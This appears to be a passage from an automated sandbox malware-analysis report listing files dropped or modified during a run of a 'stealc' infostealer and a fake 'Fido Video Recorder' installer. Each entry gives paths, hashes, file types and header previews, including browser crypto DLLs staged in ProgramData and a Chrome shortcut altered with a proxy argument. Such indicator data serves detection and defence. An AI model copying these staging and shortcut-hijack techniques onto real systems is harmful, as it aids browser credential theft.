SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKKJEHCGCGDAAAKFHJKJJJDHDH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x94f7fc92, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6586080123047318
Encrypted:	false
SSDEEP:	1536:BSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	CE80836994689751F07E413A0180D4D8
SHA1:	BF354BC2EF3F4C2DB2012F76B54E6C1128F50916
SHA-256:	DE1FF3CA0CE41D7EE0072E5D778224CAC705873A3DD337FBE2E5C20A9BDDDF52
SHA-512:	3D58A8A07B742A1B0B39CBFAF7F2C862DDEE5F789476AA51BAF2316A4AD3AED7369C4C8DF24A16C05F3EBFF800D99FEE9ECD9E5CCD5725E98FFE94FB76E0C232
Malicious:	false
Preview:	....... ...............X\...;...{......................0.z..........{.......\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................?R.O.....\|.................vgso.....\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:56 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4514660614862924
Encrypted:	false
SSDEEP:	48:8S6l2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8S6lOw
MD5:	F44904B171B0EB73D6AEB97EE1C497CD
SHA1:	C47DF076D0C9031A7A43CC1FBF9DFF2886C84EB1
SHA-256:	EFE67B38166A3A108B130BECD343955B17CD7D09696F2968A7B38F0279AD0BA7
SHA-512:	A96BE4EC462DF842F6A168DE8C108641AB44D169CF17B00001D70A0DE1D985598B5E7DE0A9D5B0E5BC08408034BE58E606F159149338CE543F684E1F6963C106
Malicious:	false
Preview:	L..................F.@.. ......,....[c^n.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.5257884005400015
Encrypted:	false
SSDEEP:	6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
MD5:	C1D465E061D7D02895DAEB19BDB28AC9
SHA1:	5E729EE51DF080545C7031D771B85094A2B2D4E9
SHA-256:	777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
SHA-512:	438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3117056
Entropy (8bit):	6.560473138005523
Encrypted:	false
SSDEEP:	49152:KYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP://FWPqRsn7niLxk0Kc9P
MD5:	B19555358F3C9ABC6157B2B7AAB2F658
SHA1:	177FDA0D1D0444E6CF1CA8A915F5F2212BD092E1
SHA-256:	2B0062E5EF0C0BBC9034BA09296F47B26DD0528DD8131DCCFD10009A516B1104
SHA-512:	6BFF37EB0C5617FAB6512C9A31E701F04ABFE1B5EB1FA70B93C83DE9A118E434ECB1F49C6E7BAF5335AE32D8B04B296835F028CA8EEE7858C11A4797E07D64B0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.5257884005400015
Encrypted:	false
SSDEEP:	6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
MD5:	C1D465E061D7D02895DAEB19BDB28AC9
SHA1:	5E729EE51DF080545C7031D771B85094A2B2D4E9
SHA-256:	777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
SHA-512:	438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-3HR51.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	3117056
Entropy (8bit):	6.560473070621625
Encrypted:	false
SSDEEP:	49152:jYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP:K/FWPqRsn7niLxk0Kc9P
MD5:	B9C06313513E81356218D8C9EA750418
SHA1:	1B1CD53A133A08EF80992537A244D333A22A4BF5
SHA-256:	FF55920072D363E0F0B38B32E9C925C314DD7358F8C3ECA4B3A04FDD8B99AFE0
SHA-512:	B3BAFBF227ABF2196A9B2E21A8AD410D4899AC8D6A63C97EB1DFA1D68FAC7F7107960C3A619CAF1CC669E248290B4E1D309002DE0B426A354D0902561034B3A2
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	6.542831007177094
Encrypted:	false
SSDEEP:	6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
MD5:	EE856A00410ECED8CC609936D01F954E
SHA1:	705D378626AEC86FECFDF04C86244006BC3AF431
SHA-256:	B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
SHA-512:	666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4.$QN.%4.$.N.%4.$IN.%4.$YN.%..$HN.%..$GN.%..$KN.%..$XN.%[N.%.O.%..$iN.%..$ZN.%.e%ZN.%..$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719720
Entropy (8bit):	6.620042925263483
Encrypted:	false
SSDEEP:	12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
MD5:	20B6B06BBD211A8ACFE51193653E4167
SHA1:	817D442B46DD6F35FD9641E0C7262C934ED76848
SHA-256:	7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
SHA-512:	0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?\|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1471856
Entropy (8bit):	6.8308189184145665
Encrypted:	false
SSDEEP:	24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
MD5:	A236287C42F921D109475D47E9DCAC2B
SHA1:	6D7C177A0AC3076383669BCE46608EB4B6B787EC
SHA-256:	63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
SHA-512:	C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1471856
Entropy (8bit):	6.8308189184145665
Encrypted:	false
SSDEEP:	24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
MD5:	A236287C42F921D109475D47E9DCAC2B
SHA1:	6D7C177A0AC3076383669BCE46608EB4B6B787EC
SHA-256:	63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
SHA-512:	C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719720
Entropy (8bit):	6.620042925263483
Encrypted:	false
SSDEEP:	12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
MD5:	20B6B06BBD211A8ACFE51193653E4167
SHA1:	817D442B46DD6F35FD9641E0C7262C934ED76848
SHA-256:	7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
SHA-512:	0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
